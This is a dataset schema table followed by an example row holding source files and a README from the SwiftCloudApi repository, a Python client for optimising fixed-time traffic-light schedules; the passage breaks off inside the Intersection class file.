| column | dtype | observed range / distinct values |
|---|---|---|
| repo_name | string | lengths 5 to 114 |
| repo_url | string | lengths 24 to 133 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| directory_id | string | length 40 |
| branch_name | string | 209 distinct values |
| visit_date | timestamp[ns] | |
| revision_date | timestamp[ns] | |
| committer_date | timestamp[ns] | |
| github_id | int64 | 9.83k to 683M (nullable) |
| star_events_count | int64 | 0 to 22.6k |
| fork_events_count | int64 | 0 to 4.15k |
| gha_license_id | string | 17 distinct values |
| gha_created_at | timestamp[ns] | |
| gha_updated_at | timestamp[ns] | |
| gha_pushed_at | timestamp[ns] | |
| gha_language | string | 115 distinct values |
| files | list | lengths 1 to 13.2k |
| num_files | int64 | 1 to 13.2k |
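As a minimal sketch of how rows with this schema could be consumed, assuming the Hugging Face `datasets` library; the dataset name `"org/dataset-name"` is a hypothetical placeholder (the dump does not identify the dataset itself), while the column names come from the schema above:

```python
# Minimal sketch, assuming the `datasets` library; "org/dataset-name" is a
# hypothetical placeholder, while the column names come from the schema above.
from datasets import load_dataset

# Stream the split so the full dataset is not downloaded up front.
rows = load_dataset("org/dataset-name", split="train", streaming=True)

for row in rows:
    # Scalar metadata columns.
    print(row["repo_name"], row["gha_language"], row["star_events_count"])
    # "files" is a list of per-file records; each record carries the file's
    # path, license and language metadata, and its full source in "text".
    for file_record in row["files"]:
        print(file_record["path"], file_record["length_bytes"])
    break  # only inspect the first row in this sketch
```

An example row is shown below.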
| field | value |
|---|---|
| repo_name | stijnfleuren/SwiftCloudApi |
| repo_url | https://github.com/stijnfleuren/SwiftCloudApi |
| snapshot_id | 44ccda2e01868ae2b305564e9f2cf13e99e76823 |
| revision_id | 30f3b6c1fd80e5cfa5ce11e1daa08a09ab1e4e9b |
| directory_id | bd3b7ff0a9605a5e8e5d217b3fc8e1084db36423 |
| branch_name | refs/heads/master |
| visit_date | 2023-07-03T05:41:02.276613 |
| revision_date | 2021-08-03T17:13:49 |
| committer_date | 2021-08-03T17:13:49 |
| github_id | 295122441 |
| star_events_count | 3 |
| fork_events_count | 0 |
| gha_license_id | NOASSERTION |
| gha_created_at | 2020-09-13T09:54:26 |
| gha_updated_at | 2021-06-26T07:51:44 |
| gha_pushed_at | 2021-07-28T06:30:51 |
| gha_language | Python |

files:
[
{
"alpha_fraction": 0.6542515754699707,
"alphanum_fraction": 0.6758022904396057,
"avg_line_length": 53.730770111083984,
"blob_id": "3922bf7b3d08ed43ca366d75b981388f14b58a4b",
"content_id": "282fe51cb6567ace55bbbc01c3445b8994b58e2c",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4269,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 78,
"path": "/swift_cloud_py/validate_safety_restrictions/validate_conflicts.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from typing import Tuple, List\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import GreenYellowInterval, FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\n\n\ndef validate_conflicts(intersection: Intersection, fts: FixedTimeSchedule, tolerance: float = 10**(-2)):\n \"\"\"\n Ensure all conflicts are satisfied.\n :param intersection: intersection object (this object contains all conflicts and associated minimum clearance times\n that should be satisfied)\n :param fts: fixed-time schedule to check\n :param tolerance: tolerance in seconds for violating safety restrictions\n :raises SafetyViolation if validations fail\n \"\"\"\n\n for conflict in intersection.conflicts:\n intervals1 = fts.get_greenyellow_intervals(signalgroup=conflict.id1)\n intervals2 = fts.get_greenyellow_intervals(signalgroup=conflict.id2)\n for index1, interval1 in enumerate(intervals1):\n for index2, interval2 in enumerate(intervals2):\n if not conflict_satisfied(interval1=interval1, interval2=interval2, period=fts.period,\n conflict=conflict, tolerance=tolerance):\n raise SafetyViolation(\n f\"Conflict not satified for interval {index1:d} of '{conflict.id1:s}' \"\n f\"and interval {index2:d} of '{conflict.id2:s}'.\")\n\n\ndef conflict_satisfied(interval1: GreenYellowInterval, interval2: GreenYellowInterval, period: float,\n conflict: Conflict, tolerance: float):\n forbidden_interval_for_sg2 = ((interval1.start_greenyellow - conflict.setup21 + tolerance) % period,\n (interval1.end_greenyellow + conflict.setup12 - tolerance) % period)\n intersection = overlap_of_intervals(interval1=forbidden_interval_for_sg2,\n interval2=(interval2.start_greenyellow, interval2.end_greenyellow),\n period=period)\n if intersection:\n return False\n else:\n return True\n\n\ndef overlap_of_intervals(interval1: Tuple[float, float], interval2: Tuple[float, float], period: float\n ) -> List[Tuple[float, float]]:\n \"\"\" compute the overlap of two periodic intervals.\n Intervals have format (starting_time, ending_time), where starting_time and ending_time are between zero and\n the period duration. 
Output is a list of intervals (as the intersection could potentially be two\n disjunct intervals\"\"\"\n\n # both are green at time T\n if interval1[0] > interval1[1] and interval2[0] > interval2[1]:\n return [(max(interval1[0], interval2[0]), min(interval1[1], interval2[1]))]\n\n # only one of the two intervals could potentially still include time=period\n # if interval1 includes time=period, then swap the intervals so that interval 2 includes this period\n if interval1[0] > interval1[1]:\n interval1, interval2 = interval2, interval1\n\n # convert the second interval to two intervals if it includes time=period; let [s,e] be interval2, then we use the\n # two intervals [s-period, e], [s,e+period], which because of periodicity are equivalent\n if interval2[0] < interval2[1]: # if this interval does not include time=period\n interval_list2_non_periodic = [interval2]\n else:\n interval_list2_non_periodic = [(interval2[0] - period, interval2[1]),\n (interval2[0], interval2[1] + period)]\n\n # compute the intersection of interval1 with the interval(s) in interval_list2_non_periodic\n overlapping_intervals = []\n for interval2_non_periodic in interval_list2_non_periodic:\n max_start = max(interval1[0], interval2_non_periodic[0])\n min_end = min(interval1[1], interval2_non_periodic[1])\n # if the two intervals overlap\n if max_start < min_end:\n # we store the interval (but first convert ot back to the range [0, period))\n overlapping_intervals.append(\n (max_start % period, min_end % period))\n return overlapping_intervals\n"
},
{
"alpha_fraction": 0.7341283559799194,
"alphanum_fraction": 0.7369344234466553,
"avg_line_length": 49.91071319580078,
"blob_id": "8f6515e189f0e57a1f243bd4a9efd332c9d62d2f",
"content_id": "65ab426277718be67a9277335d85c6f17e5fd1e2",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2851,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 56,
"path": "/swift_cloud_py/examples/evaluate_fixed_time_schedule.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import json\nimport logging\nimport os\n\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef evaluate_fixed_time_schedule(print_fixed_time_schedule: bool = False):\n \"\"\"\n In this example we show how to evaluate a fixed-time schedule.\n\n Use case: comparing two fixed-time schedules (perhaps not optimized via this api) on expected performance.\n\n NOTE:\n To run the example below you need credentials to invoke the swift mobility cloud api.\n To this end, you need to specify the following environment variables:\n - smc_api_key: the access key of your swift mobility cloud api account\n - smc_api_secret: the secret access key of your swift mobility cloud api account\n If you do not have such an account yet, please contact [email protected].\n\n In this example, we load an intersection from disk (export of Swift Mobility Desktop). You can download this\n file (example_smd_export.json) from\n https://github.com/stijnfleuren/SwiftCloudApi/tree/master/swift_cloud_py/examples\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # absolute path to .json file that has been exported from swift mobility desktop\n smd_export = os.path.join(os.path.join(os.path.abspath(__file__), os.pardir), \"example_smd_export.json\")\n\n # retrieve the json structure from the file\n with open(smd_export, \"r\") as f:\n json_dict = json.load(f)\n\n logging.info(f\"Loading intersection and traffic situation from disk\")\n intersection = Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\n arrival_rates = ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n logging.info(f\"Loaded intersection and traffic situation from disk\")\n logging.info(f\"Minimizing delay\")\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.min_delay, horizon=2)\n\n logging.info(f\"Average experienced delay: {objective_value:.2f} seconds\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n # this should return the same estimated delay. With this functionality we could evaluate the expected performance\n # of any fixed-time schedule.\n logging.info(f\"Evaluate this schedule\")\n kpis = SwiftMobilityCloudApi.evaluate_fts(intersection=intersection, fixed_time_schedule=fixed_time_schedule,\n arrival_rates=arrival_rates, horizon=2)\n logging.info(f\"Output: {kpis}\")\n"
},
{
"alpha_fraction": 0.7690077424049377,
"alphanum_fraction": 0.7760217189788818,
"avg_line_length": 53.56122589111328,
"blob_id": "692d0c9e7f7e36ff8b1ffcf726c48353c11036a5",
"content_id": "de0b4fb91df066be8d2c9a39aa378b5d37eb72a9",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10693,
"license_type": "permissive",
"max_line_length": 566,
"num_lines": 196,
"path": "/README.md",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "<img src=\"https://www.swiftmobility.eu/swiftmobility.png\" width=\"500\"/>\n\n# Swift Mobility Cloud API\n\n## Introduction\nThis library provides a pure Python interface for the [Swift Mobility Cloud API](https://www.swiftmobility.eu/services). It works with Python versions 3.7 and above.\n\n[Swift Mobility](https://www.swiftmobility.eu/) provides services for fully automated optimization of fixed-time schedules (traffic light schedules) in a matter of seconds, even for the most complex intersections. [Swift Mobility](https://www.swiftmobility.eu/) exposes a rest APIs and this library is intended to make it even easier for Python programmers to use.\n\n## Usecases\n\n### Smart traffic-light control\n\n#### Completely adaptive traffic light control\nThe API can, in real-time, compute the optimal fixed-time schedule to best handle the current traffic situation; this enables truly smart and dynamic traffic light control that automatically adapts to the actual traffic situation. For example, by periodically computing the optimal fixed-time schedule and automatically converting it to a vehicle-actuated controller (e.g., using the green times as maximum green times and allowing green times to be terminated prematurely).\n\n#### Automatically switch between control strategies\nLow traffic and heavy traffic situations require a different control strategy. The API allows you to periodically quantify the current traffic situation in an automated manner, e.g., every 30 minutes. The result could be used to (automatically!) select the control strategy that best matches the current traffic situation; this would be truly smart traffic-light control!\n\n### Monitoring\nWith the API you can quantify (in real-time) the amount of traffic arriving at the intersection to distinguish between low traffic, moderate traffic and heavy traffic situations. This information can be used to improve traffic management (e.g., redirect traffic to relieve highly congested parts of the network).\n\n### Strategic decision making\n\n#### Maintenance\nSuppose traffic flow is not as smooth as desired at an intersection (e.g., experienced delays are large). With the API you can quantify if the intersection actually has sufficient capacity. If it does, then it might be sensible to reevaluate (and potentially update) such traffic-light controllers. In this way, maintenance efforts can be focused on the intersections where large improvements can be expected. If the capacity of the intersection is expected to be insufficient as well, then this might motivate infrastructural changes (see next usecase).\n\n#### Updating infrastructure\nTraffic situations may change overtime, e.g., due to urban development. Therefore, it is very important to periodically evaluate if any infrastructural changes (or policy changes by the government) are needed.\n\nThis is a very difficult decision to be made and it has high impact; quantitative support is really useful when making these decisions. With the API you can determine the maximum traffic increase that the infrastructure is able to handle under optimal traffic light control. 
This could be used to answer questions like: Is the capacity of the infrastructure (intersection) expected to still be sufficient in the upcoming 3 years?\n\n## Installing\nYou can install the [Swift Mobility Cloud API](https://www.swiftmobility.eu/services) using:\n\n```sh\n$ pip install swift_cloud_py\n```\n## Getting the code\n\nThe code is hosted at https://github.com/stijnfleuren/SwiftCloudApi\n\nCheck out the latest development version anonymously with:\n\n $ git clone git://github.com/stijnfleuren/SwiftCloudApi.git\n $ cd swift_cloud_py\n\nTo install dependencies using pip, run:\n\n $ python -m pip install -Ur requirements.txt\n \nTo install dependencies using pipenv, run (from the swift_cloud_py/ folder):\n\n $ python -m pipenv install\n\n## Getting started\n\n### Credentials\nTo be able to connect to the Swift Mobility Cloud API you need credentials.\nTo this end, set the following two environment variables:\n - smc_api_key: this is the Swift Mobility Cloud API KEY\n - smc_api_secret: this is the Swift Mobility Cloud API Secret Key.\n\nIf you do not yet have these credentials, you can send a mail to [email protected].\n\n### How to load an intersection\nIntersections and arrival rates can be loaded from a json file exported from Swift Mobility Desktop:\n\n```python\nimport json\nwith open(smd_json_export, \"r\") as f:\n json_dict = json.load(f)\n\nintersection = Intersection.from_json(intersection_dict=json_dict[\"intersection\"])\narrival_rates = ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n```\n\n### How to create an intersection\nIntersections can also be defined programmatically. \n#### Traffic light\nCreating traffic lights:\n```python\ntraffic_light = TrafficLight(capacity=1800, lost_time=2.2)\n```\n#### Signalgroups\nCreating signalgroup:\n```python\nsignalgroup = SignalGroup(id=\"2\", traffic_lights=[traffic_light1, traffic_light2], \n min_greenyellow=5, max_greenyellow=100, \n min_red=10, max_red=100, min_nr=1, max_nr=2)\n```\n#### Relations between signal groups\nWe can create traffic light control restrictions between signal groups. 
\n\nA conflict prevents two conflicting traffic streams from simultaneously crossing the intersection.\n```python\nconflict12 = Conflict(id1=signalgroup1.id, id2=signalgroup2.id, setup12=2, setup21=3)\n```\nA synchronous start ensures that two greenyellow intervals start at the same time; this can be used to create awareness\nof partial conflicts, e.g., two opposing left movements (when driving on the right-hand side of the road).\n```python\nsync_start = SyncStart(from_id=signalgroup1.id, to_id=signalgroup2.id)\n```\nA greenyellow-lead can be used to create awareness of a partial conflict, e.g., to let turning traffic know that cyclists or pedestrians may cross the intersection.\n```python\ngreenyellow_lead = GreenyellowLead(from_id=signalgroup1.id, to_id=signalgroup2.id, min_seconds=2, max_seconds=10)\n```\nAn offset can be used to coordinate the start of two greenyellow intervals, which is useful to create green waves.\n```python\noffset = Offset(from_id=signalgroup1.id, to_id=signalgroup2.id, offset=5)\n```\n#### Intersections\nCreating an intersection with all relevant traffic light control restrictions:\n```python\nintersection = Intersection(signalgroups=[signalgroup1, signalgroup2, signalgroup3],\n conflicts=[conflict12, conflict13, conflict23])\n```\nNote: to optimize a fixed-time controller for two intersections with one controller, then this has to be 'modelled' as one intersection; the signalgroups (and conflicts etc.) of both intersections have to be provided to this Intersection object.\n\n#### Arrival scenarios\nCreate an arrival scenario (arrival rates):\n```python\nmorning_rates = ArrivalRates(id_to_arrival_rates={\"2\": [800, 700], \"5\": [300], \"8\": [350]})\n```\n\n### Storing and restoring intersections etc.\nYou can convert intersections and other objects to json; this is convenient to locally store this information for later \nre-use.\n```python\njson_serializable = intersection.to_json()\n```\nYou can later restore this same object:\n```python\nintersection = Intersection.from_json(json_serializable)\n```\n\n### Optimizing fixed-time schedules\nOptimize a fixed-time schedule for an intersection and a certain arrival rates:\n```python\nfixed_time_schedule, phase_diagram, objective_value, warm_start_info = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=morning_rates, initial_queue_lengths=estimated_queue_lengths,\n objective=ObjectiveEnum.max_capacity)\n```\nWe allow for several objectives:\n* **ObjectiveEnum.min_delay**: Search for the fixed-time schedule that minimizes the expected (average) delay experienced by road users.\n* **ObjectiveEnum.max_capacity**: Search for the fixed-time schedule that maximizes the largest increase in traffic (scaling factor) that the intersection can handle without becoming unstable/oversaturated. This gives an indication of how close to oversaturation the intersection is; an objective value of < 1 indicates that the intersection is oversaturated for all possible fixed-time schedules. This has usecases ranging from monitoring, smart traffic-light control and strategic decision making (see also swift_cloud_py/examples/maximizing_intersection_capacity)\n* **ObjectiveEnum.min_period**: Search for the fixed-time schedule that has the smallest period duration (while still being stable).\n\nYou can print the fixed-time schedule in pretty format:\n```python\nprint(fixed_time_schedule)\n```\n\n### Retrieving multiple fixed-time schedules\nThe api allows for optimizing the best *k* schedules. 
After you retrieved the best schedule via the api, you can obtain \nthe second best schedule as follows:\n```python\nfixed_time_schedule, phase_diagram, objective_value, warm_start_info = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=morning_rates, initial_queue_lengths=estimated_queue_lengths,\n objective=ObjectiveEnum.max_capacity, fixed_time_schedules_to_exclude=[best_fixed_time_schedule],\n warm_start_info=warm_start_info)\n```\n### computing phase diagram\nWhen optimizing a fixed-time schedule, also the associated phase diagram is returned. However, you can also compute the phase diagram of any other fixed-time schedule:\n```python\nphase_diagram = SwiftMobilityCloudApi.get_phase_diagram(\n intersection=intersection, fixed_time_schedule=fixed_time_schedule)\n```\nThe phase diagram can be printed in pretty format:\n```python\nprint(phase_diagram)\n```\n\n### Tuning a fixed-time schedule\nTraffic situations change throughout the day. This following function allows you to quickly adapt the green times of an existing fixed-time schedule to a new traffic situations.\n```python\ntuned_fixed_time_schedule, objective_value = SwiftMobilityCloudApi.get_tuned_fts(\n intersection=intersection, fixed_time_schedule=fixed_time_schedule, arrival_rates=midday_rates, \n initial_queue_lengths=estimated_queue_lengths, objective=ObjectiveEnum.min_delay)\n```\n### Evaluating a fixed-time schedule\nThe expected performance of a fixed-time schedule can be computed as follows:\n```python\nkpis = SwiftMobilityCloudApi.evaluate_fts(intersection=intersection, fixed_time_schedule=fixed_time_schedule,\n arrival_rates=evening_rates)\n```\nThese performance metrics can be printed with:\n```python\nprint(kpis)\n```\n\n### Examples\nOn [github](https://github.com/stijnfleuren/SwiftCloudApi) you can find several examples in the folder swift_cloud_py/examples to get you started.\n\n## License\nMIT licence"
},
{
"alpha_fraction": 0.6842105388641357,
"alphanum_fraction": 0.6842105388641357,
"avg_line_length": 20.714284896850586,
"blob_id": "533fa64368408fffeb2e0bea5e282eeacbe14a4e",
"content_id": "61c946d60239dca7bf663d6aa472792a1084c2c3",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 152,
"license_type": "permissive",
"max_line_length": 38,
"num_lines": 7,
"path": "/swift_cloud_py/enums.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from enum import Enum\n\n\nclass ObjectiveEnum(Enum):\n min_delay = \"min delay\"\n min_period = \"min period duration\"\n max_capacity = \"max capacity\"\n"
},
{
"alpha_fraction": 0.6866931319236755,
"alphanum_fraction": 0.7202085256576538,
"avg_line_length": 53.43243408203125,
"blob_id": "5368d0bd82ddfa868018a25c1b1d05b747dce680",
"content_id": "0031f1153a8ca9dc1cc1f2b45aec540234ab30a3",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4028,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 74,
"path": "/swift_cloud_py/examples/create_intersection.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import logging\nimport os\n\nfrom swift_cloud_py.enums import ObjectiveEnum\nfrom swift_cloud_py.swift_cloud_api import SwiftMobilityCloudApi\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\ndef create_intersection_and_optimize():\n \"\"\"\n Example showing how to:\n - create traffic lights, signal groups and intersections, ...\n - optimize a fixed-time schedule for this intersection\n\n NOTE:\n To run the example below you need credentials to invoke the swift mobility cloud api.\n To this end, you need to specify the following environment variables:\n - smc_api_key: the access key of your swift mobility cloud api account\n - smc_api_secret: the secret access key of your swift mobility cloud api account\n If you do not have such an account yet, please contact [email protected].\n \"\"\"\n logging.info(f\"Running example '{os.path.basename(__file__)}'\")\n # signal group consisting of two traffic light allowing 1 or 2 greenyellow intervals per repeating period.\n traffic_light1 = TrafficLight(capacity=1800, lost_time=2.2)\n traffic_light2 = TrafficLight(capacity=1810, lost_time=2.1)\n signalgroup1 = SignalGroup(id=\"2\", traffic_lights=[traffic_light1, traffic_light2], min_greenyellow=10,\n max_greenyellow=100, min_red=10, max_red=100, min_nr=1, max_nr=2)\n\n # signal group consisting of one traffic light allowing 1 greenyellow interval (default) per repeating period.\n traffic_light3 = TrafficLight(capacity=1650, lost_time=3.0)\n signalgroup2 = SignalGroup(id=\"5\", traffic_lights=[traffic_light3], min_greenyellow=10,\n max_greenyellow=100, min_red=10, max_red=100)\n\n # signal group consisting of one traffic light allowing 1 greenyellow interval (default) per repeating period.\n traffic_light4 = TrafficLight(capacity=1800, lost_time=2.1)\n signalgroup3 = SignalGroup(id=\"8\", traffic_lights=[traffic_light4], min_greenyellow=10,\n max_greenyellow=100, min_red=10, max_red=100)\n\n # conflicts & clearance times\n conflict12 = Conflict(id1=signalgroup1.id, id2=signalgroup2.id, setup12=1, setup21=2)\n conflict13 = Conflict(id1=signalgroup1.id, id2=signalgroup3.id, setup12=1, setup21=2)\n conflict23 = Conflict(id1=signalgroup2.id, id2=signalgroup3.id, setup12=2, setup21=3)\n\n # initialize intersection object\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2, signalgroup3],\n conflicts=[conflict12, conflict13, conflict23])\n\n # set associated arrival rates\n arrival_rates = ArrivalRates(id_to_arrival_rates={\"2\": [800, 700], \"5\": [150], \"8\": [180]})\n\n logging.info(f\"Minimizing average experienced delay\")\n # optimize fixed-time schedule\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, objective=ObjectiveEnum.min_delay)\n\n logging.info(f\"Average experienced delay {objective_value: .3f} seconds\")\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n # the following code indicates how to compute a phase diagram from a fixed-time schedule (note that now it makes\n # no sense to do so as it was already computed above)\n logging.info(\"Computing phase diagram from fixed-time schedule. 
Should be the same as before\")\n phase_diagram = SwiftMobilityCloudApi.get_phase_diagram(intersection=intersection,\n fixed_time_schedule=fixed_time_schedule)\n logging.info(phase_diagram)\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n create_intersection_and_optimize()\n"
},
{
"alpha_fraction": 0.6308476328849792,
"alphanum_fraction": 0.6324687600135803,
"avg_line_length": 52.28395080566406,
"blob_id": "06390220ded51a45c2c7f3eec7e393497fc50717",
"content_id": "67e7b403e9755a3e1e38a953320cbbc1f0856c02",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4318,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 81,
"path": "/swift_cloud_py/entities/intersection/signalgroup.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using SignalGroup-typing inside SignalGroup-class\n\nfrom typing import List, Dict\n\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\n\n\nclass SignalGroup:\n # noinspection PyShadowingBuiltins\n def __init__(self, id: str, traffic_lights: List[TrafficLight], min_greenyellow: float, max_greenyellow: float,\n min_red: float, max_red: float, min_nr: int = 1, max_nr: int = 1) -> None:\n \"\"\"\n Representation of signal group, which is a group of traffic lights with the same state (green, yellow, red))\n :param id: name of the signal group\n :param traffic_lights: list of traffic lights that are part of this signal group\n :param min_greenyellow: minimum duration (in seconds) of each greenyellow interval\n :param max_greenyellow: maximum duration (in seconds) of each greenyellow interval\n :param min_red: minimum duration (in seconds) of each red interval\n :param max_red: maximum duration (in seconds) of each red interval\n :param min_nr: minimum number of greenyellow intervals (during a repeating period)\n :param max_nr: maximum number of greenyellow intervals (during a repeating period);\n the lower this value the faster the optimization!\n \"\"\"\n # by converting to the correct type we already check for incompatible types\n self.id = str(id)\n self.min_greenyellow = float(min_greenyellow)\n self.max_greenyellow = float(max_greenyellow)\n self.min_red = float(min_red)\n self.max_red = float(max_red)\n self.traffic_lights = traffic_lights\n self.min_nr = int(min_nr)\n self.max_nr = int(max_nr)\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n # dict creates copy preventing modifying original object\n json_dict = dict(self.__dict__)\n # overwrite traffic lights with json version\n json_dict[\"traffic_lights\"] = [traffic_light.to_json() for traffic_light in self.traffic_lights]\n return json_dict\n\n @staticmethod\n def from_json(signalgroup_dict: Dict) -> SignalGroup:\n \"\"\"Loading signal group from json (expected same json structure as generated with to_json)\"\"\"\n return SignalGroup(id=signalgroup_dict[\"id\"],\n min_greenyellow=signalgroup_dict[\"min_greenyellow\"],\n max_greenyellow=signalgroup_dict[\"max_greenyellow\"],\n min_red=signalgroup_dict[\"min_red\"],\n max_red=signalgroup_dict[\"max_red\"],\n min_nr=signalgroup_dict[\"min_nr\"],\n max_nr=signalgroup_dict[\"max_nr\"],\n traffic_lights=[TrafficLight.from_json(traffic_light_dict)\n for traffic_light_dict in signalgroup_dict[\"traffic_lights\"]]\n )\n\n def _validate(self) -> None:\n \"\"\"\n validate the arguments provided to this object\n :return: - (raises ValueError if validation does not pass)\n \"\"\"\n if not isinstance(self.traffic_lights, list):\n raise ValueError(\"traffic_lights should be a list of TrafficLight objects\")\n for traffic_light in self.traffic_lights:\n if not isinstance(traffic_light, TrafficLight):\n raise ValueError(\"traffic_lights should be a list of TrafficLight objects\")\n\n if not self.min_greenyellow >= 0:\n raise ValueError(\"min_greenyellow must be a non-negative number\")\n if not 0 < self.max_greenyellow >= self.min_greenyellow:\n raise ValueError(\"max_greenyellow must be a positive number exceeding (or equal to) min_greenyellow\")\n\n if not self.min_red >= 0:\n raise ValueError(\"min_red must be a non-negative number\")\n if not 0 < self.max_red >= self.min_red:\n raise ValueError(\"max_red must be a positive number 
exceeding (or equal to) min_red\")\n\n if not self.min_nr >= 1:\n raise ValueError(\"min_nr must be a positive integer\")\n if not int(self.max_nr) >= int(self.min_nr):\n raise ValueError(\"max_nr must exceed or equal min_nr\")\n\n\n"
},
{
"alpha_fraction": 0.6378639936447144,
"alphanum_fraction": 0.6405919790267944,
"avg_line_length": 53.9176025390625,
"blob_id": "b0af9e0bf0edf7d25bad6fc649dfab3b17987765",
"content_id": "9a6e360d068589d28127f2f03688004112f50570",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14663,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 267,
"path": "/swift_cloud_py/entities/intersection/intersection.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using intersection-typing inside intersection-class\nimport json\nfrom typing import List, Union, Optional, Dict\n\nfrom swift_cloud_py.entities.intersection.periodic_order import PeriodicOrder\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict, SyncStart, Offset, GreenyellowLead, \\\n GreenyellowTrail\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\n\n\nclass Intersection:\n def __init__(self, signalgroups: List[SignalGroup], conflicts: List[Conflict],\n sync_starts: Optional[List[SyncStart]] = None, offsets: Optional[List[Offset]] = None,\n greenyellow_leads: Optional[List[GreenyellowLead]] = None,\n greenyellow_trails: Optional[List[GreenyellowTrail]] = None,\n periodic_orders: Optional[List[PeriodicOrder]] = None) -> None:\n \"\"\"\n intersection object containing information depending on intersection geometry and traffic light control\n strategy (e.g., sync starts etc.);\n\n Note: to optimize a fixed-time controller for two intersections with one controller, then this has to be\n 'modelled' as one intersection; the signal groups (and conflicts etc.) of both intersections have to be\n provided to this Intersection object.\n :param signalgroups: list of signal group objects present at the intersection.\n :param conflicts: list of conflicts at the intersection.\n :param sync_starts: list of synchronous starts desired for this intersection.\n :param offsets: list of offsets desired for this intersection.\n :param greenyellow_leads: list of greenyellow_leads desired for this intersection.\n :param greenyellow_trails: list of greenyellow_trails desired for this intersection.\n :param periodic_orders: list of periodic orders in which the signalgroups must receive their\n greenyellow interval; if some signal groups may have multiple greenyellow intervals, then one of these\n intervals should adhere to this fixed periodic order.\n \"\"\"\n self.signalgroups = signalgroups\n self.conflicts = conflicts\n self.sync_starts = sync_starts if sync_starts else []\n self.offsets = offsets if offsets else []\n self.greenyellow_leads = greenyellow_leads if greenyellow_leads else []\n self.greenyellow_trails = greenyellow_trails if greenyellow_trails else []\n self.periodic_orders = periodic_orders if periodic_orders else []\n self._validate()\n self._id_to_signalgroup = {signalgroup.id: signalgroup for signalgroup in signalgroups}\n\n @property\n def other_relations(self) -> List[Union[SyncStart, Offset, GreenyellowLead, GreenyellowTrail]]:\n other_relations = []\n other_relations.extend(self.sync_starts)\n other_relations.extend(self.offsets)\n other_relations.extend(self.greenyellow_leads)\n other_relations.extend(self.greenyellow_trails)\n return other_relations\n\n def to_json(self):\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n json_dict = dict(signalgroups=[signalgroup.to_json() for signalgroup in self.signalgroups],\n conflicts=[conflict.to_json() for conflict in self.conflicts],\n other_relations=[other_relation.to_json() for other_relation in self.other_relations],\n periodic_orders=[periodic_order.to_json() for periodic_order in self.periodic_orders])\n return json_dict\n\n def get_signalgroup(self, signalgroup_id: str):\n if signalgroup_id not in self._id_to_signalgroup:\n raise ValueError(f\"signalgroup with id={signalgroup_id} does not exist\")\n else:\n return self._id_to_signalgroup[signalgroup_id]\n\n @staticmethod\n def from_json(intersection_dict: 
